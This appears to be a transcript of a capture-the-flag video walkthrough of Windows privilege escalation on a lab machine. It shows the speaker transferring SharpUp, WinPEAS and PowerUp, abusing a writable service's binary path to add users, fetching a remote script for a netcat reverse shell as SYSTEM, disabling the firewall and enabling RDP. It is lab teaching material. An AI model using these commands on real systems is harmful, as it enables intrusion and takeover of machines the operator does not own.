So let's go into a place we can write. So we can probably write in user public documents, echo test dir. So we can write in this folder. So we're going to drop a few executables. I want to grab the WinPEASEXE. And for this, I'm going to compile everything myself. So let's switch over to Windows so we have Visual Studio to compile. Now that we're on Windows, I'm going to pull up Chrome and we're going to download two different prevest checkers. The first one I'm going to do is SharpUp GitHub. And this is going to just be the standard like .NET version of PowerUp. So let's open a command prompt, go into desktop GitHub and clone this repository. And the other one I want to do is WinPEAS. And I always recommend running multiple, especially when there's a new one coming out, because there may be bugs. So right now we're working on a bug to fix missing writable service. Right now it is discovering it, but it's outputting a bit too much information. But before this video, it wasn't discovering this at all. So that's why I always recommend running multiple things, because there are bugs in free tools. And if you run two, you can find those bugs pretty easily and report them to get them fixed. So hopefully one day we'll just have one good tool, but right now, recommend running multiple. So we go in this folder and we go open it to compile. So WinEXE. And I'm going to show you why I hate just pulling tools and compile tools and running them mainly. I always recommend when it comes to .NET is compiling yourself, because if you have an error, which we'll have, I think, when I do SharpUp, you can fix it easily. So I switch that to release and I can rebuild the solution. It'll say it's probably building to the release folder. So it built to release, probably right here. And I'm just going to create a directory, the infamous temp directory on a desktop, and place that file there. And now let's go and open SharpUp. So if we open this, whoops, past where the Visual Studio file was. And we compile this. Once it opens, release, rebuild solution. So now we have two. So bin, release, SharpUp, paste this here. And actually, before I do that, let's, I think I have to be administrator open bash, because I don't think this just has Python, or do I? I do. So I don't even have to open bash. Exit. There we go. CD desktop, CD temp, and then python-m http.server. And my IP address here is 135. So back on my web server, I can do curl, or I'll just do wget. 172.16.10.135, port 8000, SharpUp.exe. Ping 172.16.10.135. Connection refused. I'm just going to do this in bash. It's going to be funny when this works. Mount C users ipsec desktop temp python 3-m htb.server. Okay. Yep, that works. It's funny that running bash on Windows is working better than the command prompt, but let's do WinPEASE.exe as well. Let's rename this .1 to WinPEASE.exe. So now we have both those files. So we can go up here, do a wget 10.10.14.2, start the server, SharpUp.exe -o SharpUp.exe to download that, and we can do the next one, which is WinPEASE.exe, to download that. So we got two files. If we execute SharpUp.exe, it doesn't give us any prompt. We do SharpUp.exe, I think audit is another flag you can do in this. We don't get anything. So SharpUp's not working at all. We do have PowerUp, I think, on our computer, so we could just copy this. I never updated my thing because that's definitely not in my directory. But I can copy that. And if we do IEX new object net.web client download string HTTP 10.10.14.2 PowerUp.exe 404 not found. Oh, PowerUp.ps1. My bad. And I did not do rlwrap. Let's do that real quick. rlwrap, do I have it? Apt install rlwrap. One of the habits I'm just not into is always using this program when doing Windows shells. It makes life 10 times easier. Come on. Process the triggers for the man page. There we go. So we can do rlwrap on that netcat command, and then go back and just get that shell again. cd users public documents. But now I have up, down, left, right, so quality of life 10 times better. We were trying to IEX pull the PowerUp, so 10.10.14.2 PowerUp.ps1. We can get that. And because I didn't put invoke all checks at the bottom of this, if we look at PowerUp.ps1, doesn't run any commands, it just loads a bunch of things. So if I just do invoke all checks, this is a PowerUp command, it will run PowerUp. And this is pretty much everything that is in SharpUp. So we can see what SharpUp would have said. And at the end of the video, we will go back and troubleshoot SharpUp. It just helps a lot with having remote desktop. So let's get system, get a remote desktop to the server, and then we'll run SharpUp and see what error message it's displaying, and then fix it. Now that it's done, we can just go and scroll up, and we see right away checking service permission shows that this is vulnerable. We could exploit this by just running this command. Before I do that, I want to see what the bin path of the service is first, because I think default PowerSploit behavior just has it creating the user John with a weak password. So I just want to make sure I can reset this back to default in case PowerSploit doesn't do that for us, or PowerUp. So I'm doing sc query uso svc, and that's right. PowerShell overwrites that sc command. It's got a weird alias. So if you want to do this within a PowerShell or VerShell, you have to do cmd/c when using sc. So let's see. That's not it. Query ex. No. I hate that there's so many different ways to query a service in Windows. There we go. SCQC. And we can get binary path. So this is what that invoke service abuse is overwriting. So if we, whoops, that went on my clipboard. So invoke S, we can copy this. And if we just run this, we will see that it runs this command, net user John password 123/add. So if we do a net user on the box, we can see there's now a user called John. If we do smb client-l array.htb, is cvol there? No, cvol is not there. So I don't know if this would actually work. We need like cvol for PSExec to be able to download it. I guess we'll just have to accept we trust this ran. Actually, we can do sc. We can do command and redo this and change the user. So if you do this, John 2, and now we do net user, we can see John 2 was created. If you want to do this manually without this PowerShell, you got the sc command again. So sc config bin path is equal to, and I think it's really weird on quotes. So we can do this, and then we just copy this, and we'll say IPSEC, we'll call this please subscribe, sc config bin path. What don't you like? So when in doubt, erase things and see if it gets set. cmd sc config bin path. Set. Oh. sc config uso svc. There we go. Forgot to say the service name. Net user IPSEC password 123/add. So we can see we don't have that user there yet, but if we do cmd/c sc restart uso svc, we got an error message, but net user, I'm just going to do restart-service uso svc. And we can see IPSEC was created. So let's run WinPEAS to see what this output looks like. cmd/c WinPEASE.exe cmd fast. So we can see how this program looks. Shouldn't take too long. There we go. And you got the pretty colors again. So you can search through this quickly and find where it is. AppCMD. Again, the nice thing about this, highlights everything important in red. Probably should look at what that port is. I think that's Ghidra itself. And this is the noise I was talking about in the Git issue of it listing every service. Probably just a simple bug. But right here, modify service, USO SVC. So that's how you do this with WinPEAS. But let's actually get a shell on this box and figure out why SharpUp's not working. So let's just do... I wonder if we can just do the same thing, except say PowerShell coded command and go and grab www, what is it, evil.sct, and grab this. I wonder if this will work. I know there's a limit to like the length you can put in the binary path of a service, so maybe that's too big. It didn't get evil.ps1, so I think that may be too big, unfortunately. cmd/c. Oh, there we go. So that'll work. We just need the cmd/c. So nc lvnp 9001. And it looks like, oh no, it did not hang. Restart, got, who am I? We're now system. So we can enable remote desktop. So net sh adv firewall set all profiles equals off. What is it? Net sh disable firewall adv. Net sh adv firewall set all profiles stayed off. Net sh adv firewall set all profiles stay off. There we go. I wonder if it didn't like, oh, I had a period at the end. Stupid clipboard. So we now disabled the firewall. So we can do nmap-p3389 ra.htb. Still closed. So we have to enable remote desktop. Enable remote desktop, command line. And we'll follow these instructions. I think it's just that registry key. This. Paste. Open. Awesome. xfree rdp /v /v ra.htb /u. I think John /p password 123. Accept the certificate. And we can remote into the server. And if you watched a lot of the other videos where I do .NET stuff, you can probably guess what the issue is. It is the .NET framework version. So come on, load. Open a command prompt. cd users cd public documents. SharpUp. Sure, keep the firewall off. Come on. SharpUp.exe. And we can see it's got this annoying Windows feature thing. And .NET Framework 3.5. So if we go back to our Windows compiling VM and look at SharpUp and go properties on this, we can see its target framework is .NET version 3.5. If we simply just change this to framework version 4 and then recompile it, let's just file. I press Control S to save. I don't think I have to do that, but have it to always save before compiling. We have now rebuilt it. So we can copy, paste, replace. Do I still have the thing going? I do. So go over here. rm SharpUp.exe wget SharpUp.exe to download it. And then we can download it over here. dl SharpUp.exe wget-o SharpUp.exe HTTP 10.10.14.2 SharpUp.exe. Let's see. Then I start the web server back up. And now when I run it, it now will work. So let's go back in this old context and run /SharpUp.exe. And you can see SharpUp is running. And it's got a bit better output than PowerUp because it is newer. So yeah, I don't know what I was going to say there, but that is that. So hope you guys enjoyed the video. Take care, and I will see you all next week. Oh, wait, there's one last piece. If you do the box this way and go in, whoops, we can just do this. Actually, this is what my system shell is. cd/users administrator dir desktop. You'll notice that we shouldn't be able to get the flag. We get a permission denied even though we are root. Well, we are NT authority. But if we went through and looked at this flag in the GUI, we still won't be able to take ownership because it's using the Windows encrypted file system. So if we just go to administrator, yeah, continue. Desktop, root. You probably can't see it because it's so small. It's got a little yellow lock icon. And that means EFS is encrypting it. So if you wanted to see this flag, you should go to ipsec.rocks. And let's see. Migrating to a user. You can either migrate to the user or follow a helpline using Mimikatz to decrypt it. So if you wanted to read it this way, you'd either have to be that user or use Mimikatz. So hope you guys enjoyed the video. Take care, and I will see you all next week.